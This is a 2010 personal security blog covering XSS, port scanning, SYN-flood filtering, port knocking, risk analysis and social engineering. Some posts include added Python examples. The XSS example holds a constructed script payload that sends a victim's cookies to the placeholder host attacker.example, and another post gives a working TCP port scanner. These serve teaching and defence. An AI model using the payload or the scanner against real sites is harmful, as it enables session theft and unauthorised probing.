Sunday, December 5, 2010

Social Culture of Hackers



Hacking is often seen as an underground scene, but it is very social in nature. No man is an island in the hacker or security community. Hackers share information very liberally: sites spring up every day to share tools, techniques, news, and other information with fellow hackers and security professionals. Security professionals need to embrace the hacker community, not in order to use the techniques of crackers, but so that the techniques are known and defenses can be developed.

A couple of well known hacker underground sites include:
Hackers Center Security: http://forums.hackerscenter.com/index.php
The Hacker Community: http://www.hacker.org/
The 2600: http://www.2600.com/
Defcon: http://www.defcon.org/
Most of the hacker community never meets face-to-face. They hang out on IRC, chat sites, and IM. The only time people get together in person is at the Defcon and Black Hat security conferences.

Mailing lists and RSS feeds are the lifeblood of the security professional. Through them, information is delivered as soon as it is available. If you keep up with the research and the security holes found in software packages, you are better able to defend against those weaknesses.

It is a fine line between a criminal cracker and a security professional. Both use the same tools and techniques to attack and defend computer systems, and both run in the same hacker community because both are curious about technology and gadgets. The only way you can tell the difference is by their actions.


Hackers have big egos. They love to talk, and in most instances they love to share their secrets. Hacking is not hard; you just have to know what you want to accomplish before you start. You can go to forums and chat sites and discover all sorts of new techniques and procedures.

Friday, December 3, 2010

Personal Information as a Security Vector

Personal information such as SSNs, medical records, and academic records is only as secure as the knowledge the staff has gained in order to protect it. The security team can be well trained in computer and physical security. They can be experts in cryptography, firewalls, or security architecture, but if the security team does not train others and pass along some of that knowledge, it will not be long before the information they are trying to protect is owned by a cracker who knows how to get inside the company and compromise the integrity of the data.

No matter how good a security policy is, companies are always vulnerable to penetration from the outside or even from the inside. Just this past week the employees of my company were told that we could no longer bring in USB devices or any other storage devices, including personal laptops, because one employee was caught taking company information home. Although I was not informed of what information the employee was taking home or why, the fact is that he brought the information home. We used to have a program that was supposed to encrypt the drive so that the drive would then be usable only on the computer that encrypted it, so I'm not sure what happened with that security measure. The bad thing is my company deals with social security numbers and medical information every day, so I know that system and procedure would not be HIPAA compliant.

Also it would not be hard to gather the usernames and passwords of the employees at the company, because most of the time the information is on their desks or you can just ask them and they will be happy to give it to you, and most of the time the users do not lock their desktops when they leave their desks. This provides instant access to every SSN in the country, and the person who would get called out would be the user, because SSA knows who accesses what SSN and when it is accessed.
Remember to go to the training classes when they are offered. If you don't, you may unknowingly give out personal information that you do not have the right to release.

Thursday, December 2, 2010

Part 2: Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is one of the most common application-layer web attacks. XSS targets the scripts that run in the user's web browser rather than code on the server side: the attacker gets the application to deliver a script of the attacker's choosing, and the browser executes it with the trust it gives the legitimate site. A basic example is a malicious user crafting a link to a legitimate shopping site with a script embedded in the URL. When a victim follows the link, the site reflects the script back into the page, the script runs in the victim's browser, reads the cookie for the shopping site, and sends it to the malicious user, who can now hijack the legitimate user's session.
An online business cannot afford to lose the trust of its present and future customers simply because nobody ever stepped forward to prove that its site was really vulnerable to XSS. Exploited XSS is commonly used to achieve the following malicious results:
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user's web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks
Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information and to perform transactions in the victims' names. The major cause of XSS is missing input validation and output encoding within the application. A lot of applications do not validate their input, and they write it back into pages without checking whether the browser will treat it as markup or script rather than as plain text.

Ways to Prevent Cross-Site Scripting Attacks
1.      Validate input: Go through your code and test it. Ask yourself, "If a person enters code in this textbox, will the code execute?" The only way to find out is to try it: submit a harmless probe such as <script>alert(1)</script> and see whether it runs. (SQL commands entered in a textbox are a separate problem, SQL injection, covered later in this series.) Where a field has a known shape, such as a username or a ZIP code, accept only that shape and reject everything else.
2.      Escaping: Escaping, also called output encoding, replaces the characters that have meaning in HTML, such as <, >, &, " and ', with their entity equivalents (&lt;, &gt;, &amp;, &quot;, &#x27;) at the moment the value is written into the page, so the browser renders them as text instead of markup.
For more information on cross-site scripting and other web application security topics, check out OWASP.
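The two defenses above side by side, as an added example that is not from the original post: a search page that reflects the query into its HTML, once without encoding and once with it, plus an allow-list validator for a field with a known shape. The cookie-stealing payload and the host name attacker.example are constructed for the demonstration; the script-tag probe at the end is the "does it execute?" check from step 1, run against the rendered output rather than the input.

```python
# Added example (not from the original post): reflected XSS and its two
# standard defenses, output encoding and allow-list input validation.
import html
import re

# Constructed attacker input. attacker.example is a placeholder host.
PAYLOAD = ('<script>new Image().src="http://attacker.example/?c="'
           '+document.cookie</script>')


def render_search_vulnerable(query: str) -> str:
    """Reflects the query straight into the page: classic reflected XSS."""
    return f"<p>Results for: {query}</p>"


def escape_html(value: str) -> str:
    """Output-encode for HTML element content and quoted attribute values.
    html.escape with quote=True turns & < > " and ' into entities."""
    return html.escape(value, quote=True)


def render_search_safe(query: str) -> str:
    """Same page, but every untrusted value is encoded as it is written out."""
    return f"<p>Results for: {escape_html(query)}</p>"


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def is_valid_username(value: str) -> bool:
    """Allow-list validation for a field with a known shape. This complements
    encoding; it cannot replace it, because free text (a comment, a search
    query) has no shape you can allow-list."""
    return USERNAME_RE.fullmatch(value) is not None


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(rendered: str) -> bool:
    """The probe from step 1: does the rendered page still hold a live
    <script> tag? True means the browser will execute the attacker's code."""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
```

The safe renderer returns the payload as visible text (&lt;script&gt;...), which is exactly what a user who typed it should see; the vulnerable one returns markup the browser will run in the shopping site's origin.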


 

Thursday, June 24, 2010

Web Application Security 101

Part One: An Introduction

Web application security is often the forgotten child of web designers and programmers. Why is that? Web applications should be the single most important code and process taken into account when designing websites. After all, you are trusting the websites to be trustworthy, especially those of established brick and mortar stores. That is where the problem lies: a lot of stores and websites are not used to designing security plans for collecting and processing customers' information.


I will discuss in the coming weeks areas of vulnerability within websites that web designers and programmers need to take into consideration before creating a site. Security should not be taken for granted. Applications need to be designed from the ground up with security in mind. Most applications on the web are designed with security as an afterthought and do not include security checks until after there has been a breach and it has reached the news media.

During this series of posts we will discuss cross-site scripting, SQL injection, web site authorization, SSL vulnerabilities, man-in-the-middle attacks, and other topics as I think of them. :) The purpose of the articles is to inform both programmers and end-users what to look out for while exploring a website. Continue with me on this exciting journey, and we will both learn something and maybe better secure the Internet, or at least bring about a better understanding and awareness of application security.


Thanks,

Lance Howell

Wednesday, May 12, 2010

Port Scanning

Port scanning is an intrusive activity. It is the process of probing each port on a host to learn whether a service is listening there. An aggressive scan can also cause a denial of service if it runs fast or long enough. The scan types in use include half-open (SYN) scans, FIN scans, XMAS scans and other stealth scans designed to slip past a firewall. Each port is reported as filtered, open, or closed.


Cases have been brought attempting to convict people for port scanning, but the courts have repeatedly held that scanning alone is not a crime. The rules do vary from state to state. One of the better known cases is Moulton v. VC3, in which Scott Moulton, owner and operator of a security company, was testing a county's 911 system for vulnerabilities and scanned VC3's firewall. Once the scan had been explained, the judge agreed that it was not a crime. That was in 2000.

But just because it is not against the law does not mean it is not intrusive or that it does not consume computer and network resources. A scanner has to send traffic to each port in order to discover whether it is open or closed. Even if you receive no data from the services themselves, you are learning about the company's network and infrastructure: how secure or insecure it is and, in some instances, what programs or equipment it is running.
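As an added example (not from the original post), here is the classification a plain TCP connect scan performs, written in Python and run against a throw-away listener on 127.0.0.1 so that it works offline. The open/closed/filtered labels follow nmap's convention. The loopback target is constructed for the demonstration, so only the open and closed branches are exercised here; the filtered branch needs a real firewall dropping the probe.

```python
# Added example: a minimal TCP connect scanner that labels each port the
# way nmap does, plus a constructed loopback target so it runs offline.
import socket


def scan_port(host: str, port: int, timeout: float = 0.5) -> str:
    """Probe one TCP port and return 'open', 'closed' or 'filtered'.

    A completed three-way handshake means something is listening (open).
    An immediate RST (connection refused) means the host is reachable but
    nothing listens there (closed). No answer at all before the timeout
    usually means a firewall silently dropped the SYN (filtered).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError:
        # Host unreachable, no route, etc.: no usable answer from the port,
        # so report it as filtered rather than guessing.
        return "filtered"
    finally:
        sock.close()


def scan_ports(host: str, ports, timeout: float = 0.5) -> dict:
    """Scan several ports. Every probe sends real traffic to the target."""
    return {port: scan_port(host, port, timeout) for port in ports}


def start_listener(host: str = "127.0.0.1"):
    """Constructed target: a throw-away listener on an ephemeral port.
    Returns (server_socket, port); the caller closes the socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_port(host: str = "127.0.0.1") -> int:
    """Pick an ephemeral port, release it, and return it: a port with no
    listener, for the 'closed' case."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def demo() -> dict:
    """Scan one listening port and one idle port on loopback."""
    srv, listening = start_listener()
    try:
        return scan_ports("127.0.0.1", [listening, free_port()])
    finally:
        srv.close()


if __name__ == "__main__":
    for port, state in demo().items():
        print(f"{port}/tcp {state}")
```

Note that even the "closed" result is information: the RST proves the host is up and reachable, which is exactly the kind of infrastructure knowledge the paragraph above says a scan leaks.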

Thursday, April 8, 2010

Risk Analysis Life Cycle

  1. Identify the Risks: Determine your assets and identify the threats that are likely to attack those assets.
  2. Assess the Risks: Determine each asset's value. Produce a risk matrix to determine which risks are greater given the company's environment.
  3. Develop a Risk Management Plan: Set up policies, procedures, and backup and recovery plans.
  4. Implement Risk Management Actions: Put your policies and procedures in writing, and do training and awareness with other employees.
  5. Re-evaluate the Risks: Every six months review your risks and policies and make sure they are still relevant. Determine which risks are still the most likely to be realized.

Thursday, March 25, 2010

Common Threats and Safeguards to Be Aware of

Social engineering is one of the most difficult hacking techniques to defend against because it attacks the human element. It is about manipulating employees, using non-technical means to discover information about the company or its users, and exploiting that to gain access to the network. The best safeguard against social engineering is to educate the users and executives of the company. Teach them not to give out private personal information without first verifying who is asking. No one should ever need to know a user's password or the access codes to their equipment. Train employees in the proper way to discard sensitive information: papers with social security numbers or financial information do not go in a regular trash can; teach them the proper use of the shredder. Security is all about trust and forming trust relationships. If you do not have trust, how can you be secure? That is why social engineering is so difficult to secure against: you are trusting your employees not to click on links in e-mails, not to give passwords to strangers, not to keep their passwords in the open, and not to throw sensitive information away in the normal trash.


A Denial of Service (DoS) attack targets a network or web infrastructure. Its major objective is to prevent legitimate use of a network by blocking authorized access to resources, delaying time-critical operations, or degrading services. One of the most common types of DoS attack is TCP SYN flooding, which usually relies on IP spoofing: the attacker sends a stream of SYN packets with forged source addresses, so the half-open connections never complete and fill up the server's connection backlog. A safeguard against this kind of attack is a filtering router that restricts what may enter your external interface, known as an input filter or ingress filter. You should also filter outgoing packets whose source address does not belong to your internal network, so that a source-IP spoofing attack cannot originate from your site.
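The ingress and egress filters just described, written out as decision logic in an added example (not from the original post, and not a vendor's router configuration). The site prefix 192.0.2.0/24, the bogon list and the sample packets are all constructed for the demonstration; the egress rule is the one that stops your own network from being the source of someone else's spoofed flood.

```python
# Added example: anti-spoofing ingress and egress filters for a border
# router, expressed as decision functions over packet source addresses.
import ipaddress

# Constructed: the address block the site legitimately owns.
SITE_PREFIXES = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed bogon list: source addresses that should never arrive from
# the public Internet (RFC 1918 private space, loopback, link-local, 0/8).
BOGONS = [
    ipaddress.ip_network(net)
    for net in ("0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8",
                "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16")
]


def _in_any(src: str, networks) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in networks)


def ingress_decision(src: str) -> str:
    """Packet arriving on the external interface from the Internet.

    Drop it if it claims to come from our own prefix (it cannot, it came
    from outside) or from a bogon range: both are classic forged sources
    in a SYN flood.
    """
    if _in_any(src, SITE_PREFIXES) or _in_any(src, BOGONS):
        return "drop"
    return "accept"


def egress_decision(src: str) -> str:
    """Packet leaving the site towards the Internet.

    Only our own addresses may leave; anything else is a spoofed source,
    and we refuse to be the origin of a flood against someone else.
    """
    return "accept" if _in_any(src, SITE_PREFIXES) else "drop"


def filter_packets(packets):
    """Apply the right filter by direction. Each packet is a dict with
    'direction' ('in' or 'out') and 'src'; returns (src, direction, decision)."""
    results = []
    for pkt in packets:
        if pkt["direction"] == "in":
            decision = ingress_decision(pkt["src"])
        else:
            decision = egress_decision(pkt["src"])
        results.append((pkt["src"], pkt["direction"], decision))
    return results


# Constructed sample traffic.
SAMPLE_PACKETS = [
    {"direction": "in",  "src": "203.0.113.9"},   # ordinary Internet client
    {"direction": "in",  "src": "192.0.2.77"},    # claims to be us: spoofed
    {"direction": "in",  "src": "10.1.2.3"},      # RFC 1918 source: bogon
    {"direction": "out", "src": "192.0.2.15"},    # our own host going out
    {"direction": "out", "src": "198.51.100.4"},  # not ours: spoofed egress
]

if __name__ == "__main__":
    for src, direction, decision in filter_packets(SAMPLE_PACKETS):
        print(f"{direction:3} {src:15} {decision}")
```

These two checks do not stop a flood that uses real, unspoofed addresses; they remove the forged-source variety and make the rest traceable.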

E-mail attacks are very common as more people get connected. Spam, phishing, and malware all arrive through e-mail. How do you safeguard against these attacks? The simple answer is don't use e-mail: make phone calls or send a letter to the person you are trying to reach. Those are not very good solutions. Just because a technology is not inherently safe does not mean you cannot use it safely; if that were the case, why are you on a computer, or using a pen or a telephone? To protect your network from e-mail attacks, remember to educate the users. Don't click on links in an e-mail. If you have to go to the link, open a new browser window and type the address in yourself. If you are told to log in to your bank or credit card site, do it from the site's home page, and remember that a bank will never ask you by e-mail to log in to change records or verify account information. If they do, you need to change banks, because they lack good information security procedures. Do not run a program straight from your e-mail. Save it to your desktop, and run it from there.

Saturday, March 20, 2010

Knock, Knock Let Me In

Do you know who is trying to get in to your network? Someone is always knocking at your door. The doors of a network are called ports. Anyone working on my network should have a fairly good understanding of why a port is open, and if they do not have a good reason for it to be open then close it. Port knocking provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. Some basic functionality needs to be provided by any port knocking implementation:


  1. A way to monitor the firewall log file needs to be devised. 
  2. A method to extract the sequences of ports from the log file and translate their payload into usable information. 
  3. Once the information is obtained from the sequence, the implementation must provide some way to manipulate the firewall rules.
Port knocking sounds like a great solution when it comes to hiding services behind closed ports on a firewall, but it does come with a few disadvantages. You have to use a client script in order to perform the knocks. This script should be kept secret, on removable media such as a USB drive. A number of ports need to be allocated for exclusive use by the system. And any system that manipulates firewall rules in an automated fashion requires careful implementation.
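An added example (not from the original post) that implements the three pieces listed above in Python against a constructed log excerpt: a parser for lines an iptables LOG rule with the prefix KNOCK would write, a per-source state machine that recognises the secret sequence 7000, 8000, 9000 within a ten-second window, and the iptables command that would open SSH for the successful knocker. The sequence, the window, the log prefix and every address in the sample are assumptions; the firewall command is returned as a string and not executed, which is where the "careful implementation" warning applies.

```python
# Added example: the three parts of a port-knocking daemon, run over a
# constructed syslog excerpt instead of a live firewall log.
import re
from datetime import datetime

# Assumed secret sequence, knock window and protected service.
KNOCK_SEQUENCE = (7000, 8000, 9000)
WINDOW_SECONDS = 10
PROTECTED_PORT = 22

# Matches lines an iptables "-j LOG --log-prefix 'KNOCK '" rule would write.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: KNOCK "
    r".*?SRC=(?P<src>\d+\.\d+\.\d+\.\d+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_knock_line(line):
    """Part 1: return (timestamp, source_ip, destination_port), or None for
    lines that are not knock records (sshd, cron, other kernel messages)."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Syslog stamps carry no year; 2010 is assumed from the post date.
    ts = datetime.strptime("2010 " + m["ts"], "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])


def find_successful_knocks(lines, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
    """Part 2: walk the log once and return sources that completed the sequence.

    State per source is (knocks matched so far, time of the first knock).
    A wrong port resets the sequence and so does exceeding the window, so a
    port scanner that touches the same ports in the wrong order, or a
    knocker who is too slow, never opens the door.
    """
    progress = {}
    opened = []
    for line in lines:
        parsed = parse_knock_line(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        matched, started = progress.get(src, (0, ts))
        if matched and (ts - started).total_seconds() > window:
            matched = 0  # too slow: start over
        if dpt == sequence[matched]:
            if matched == 0:
                started = ts
            matched += 1
        elif dpt == sequence[0]:
            matched, started = 1, ts  # wrong port, but a fresh first knock
        else:
            matched = 0
        if matched == len(sequence):
            opened.append(src)
            matched = 0
        progress[src] = (matched, started)
    return opened


def open_rule(src, port=PROTECTED_PORT):
    """Part 3: the firewall change a successful knock triggers (returned, not run)."""
    return f"iptables -I INPUT -s {src} -p tcp --dport {port} -j ACCEPT"


# Constructed log excerpt: one correct knocker (203.0.113.7), one scanner
# hitting the knock ports in the wrong order (198.51.100.9), and one
# knocker who waits too long between knocks (192.0.2.50).
SAMPLE_LOG = """\
Mar 20 10:15:01 gw kernel: KNOCK IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.1 PROTO=TCP SPT=40001 DPT=7000
Mar 20 10:15:02 gw kernel: KNOCK IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.1 PROTO=TCP SPT=40002 DPT=8000
Mar 20 10:15:02 gw kernel: KNOCK IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.1 PROTO=TCP SPT=5555 DPT=7000
Mar 20 10:15:03 gw kernel: KNOCK IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.1 PROTO=TCP SPT=40003 DPT=9000
Mar 20 10:15:03 gw sshd[2140]: Failed password for invalid user admin from 198.51.100.9 port 5560 ssh2
Mar 20 10:15:04 gw kernel: KNOCK IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.1 PROTO=TCP SPT=5556 DPT=9000
Mar 20 10:15:05 gw kernel: KNOCK IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.1 PROTO=TCP SPT=5557 DPT=8000
Mar 20 10:15:10 gw kernel: KNOCK IN=eth0 OUT= SRC=192.0.2.50 DST=192.0.2.1 PROTO=TCP SPT=6000 DPT=7000
Mar 20 10:15:25 gw kernel: KNOCK IN=eth0 OUT= SRC=192.0.2.50 DST=192.0.2.1 PROTO=TCP SPT=6001 DPT=8000
Mar 20 10:15:26 gw kernel: KNOCK IN=eth0 OUT= SRC=192.0.2.50 DST=192.0.2.1 PROTO=TCP SPT=6002 DPT=9000
""".splitlines()


if __name__ == "__main__":
    for src in find_successful_knocks(SAMPLE_LOG):
        print(open_rule(src))
```

Only 203.0.113.7 gets a rule. A real daemon would also need to remove that rule again after a timeout and to rate-limit sources, otherwise the "careful implementation" caveat above turns into a firewall that opens itself to anyone patient enough to brute-force three port numbers.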

Thursday, March 18, 2010

Awards and Achievement

Well, it is 2:37pm and I am in the process of getting ready to be inducted into the Alpha Beta Kappa National Honor Society. I do admit I have worked hard towards this event. I know my family and I have both sacrificed a lot and will sacrifice a lot for this achievement. I have given up my weekends, most of my nights, and days. I could have been with my wife during those times, but my choices have led me down this path. We both wonder sometimes if the pressure of school is worth it in the end...

I think it will be. I have just one goal, and that is to provide a better lifestyle for my wife and our future child together. That is what this degree is all about to me. Some of my classmates only see it as a way to get a job and have fun. I see it as more than that. I know my value, and I must convey that to any potential employers. That is why I will not settle for just any job; it has to be the right job. I have done that before, and I will not go down that road again.

I am very excited about being a member of such a prestigious organization. I am ready to prove to everyone that I am smart and that the decision to go to school was the right one. By December I hope, with the help of God, that I will be valedictorian of my class. If not that, then at least in the top ten percent. I just wish that I had applied myself like this in high school. I might have turned out a little different. I finally get to right that wrong.

Back to the question... Is the ABK honor important to me? Heck yes it is. To some people it may not be. I just hope that I can live up to the standards and do them and my family proud.

Thursday, February 18, 2010

Risk Assessment Necessary Evil

This week I have been learning about doing risk assessments in order to work out how much a company would actually lose if it lost equipment or data. I learned it is tough coming up with all that could go wrong and with everything of value within a company that I need to take into account.

The hardest part of the "assessment" is assigning a numerical value. You have to think of the employees' worth and the amount of time that goes into the assessment. You also have to think of the time it takes to replace the data and information that may be compromised if a system fails.

Will you be able to recover quickly? Remember that the longer your system and network are down, the longer you will not be satisfying customers' needs. You have to be prepared. Make the necessary backups and images, and have the necessary disks. Do you have extra computer parts in case your system blows up? Are the backup and recovery procedures written down, and is the staff prepared to implement those procedures? These are the questions to ask.

Systems should be operational within an hour. If they are not, then something is wrong with your recovery procedure. The quicker you can get back to work the better. I know there are some extreme instances where that will not be possible, but that also needs to be taken into account.

As always, leave me a comment about anything I say, and remember: stay secure out there.

Monday, February 15, 2010

Linux in a Nutshell 5th Edition Review

Linux in a Nutshell, 5th Edition, by Ellen Siever, Aaron Weber, Stephen Figgins, Robert Love, Arnold Robbins, et al., is a fantastic reference book for both newbies to Linux and system administrators with 20+ years of experience. The book is published by O'Reilly Media, the leader in great and easy-to-read technical books. The book is a massive 944 pages, two-thirds of which are Linux commands, with details and examples of most if not all of the options for each command. If you are reading a forum post and want to find the truth about what a command is doing to the system, use this book to find out, so you won't be left possibly deleting your system. The commands are listed in alphabetical order, so it is easy to thumb to the correct one. It is great for learning about the commands. I think listing the commands in this kind of format is the best thing about the book. I will use that section for years to come.

Also, if you want to know how to set up different services or servers running Linux, you can with this book too. You can learn about DNS/BIND, SSH, file sharing, networking and a lot more within the other chapters of the book.

My only caution with this book is that it is for the person wanting to become proficient in the use of the command line. It is not for the typical user unless you love the command line. If you are a casual user then I would recommend an Ubuntu book by O'Reilly. There are no graphics in the book, so you will know the command line by the time you study and read it. Also, you cannot understand the command line unless you use it day in and day out.

I give this book 4 out of 5 penguins, just because I wish they had given more examples and covered more administration topics and expanded on them. But it is still a wonderful book and reference tool. It will stay next to me and my computer.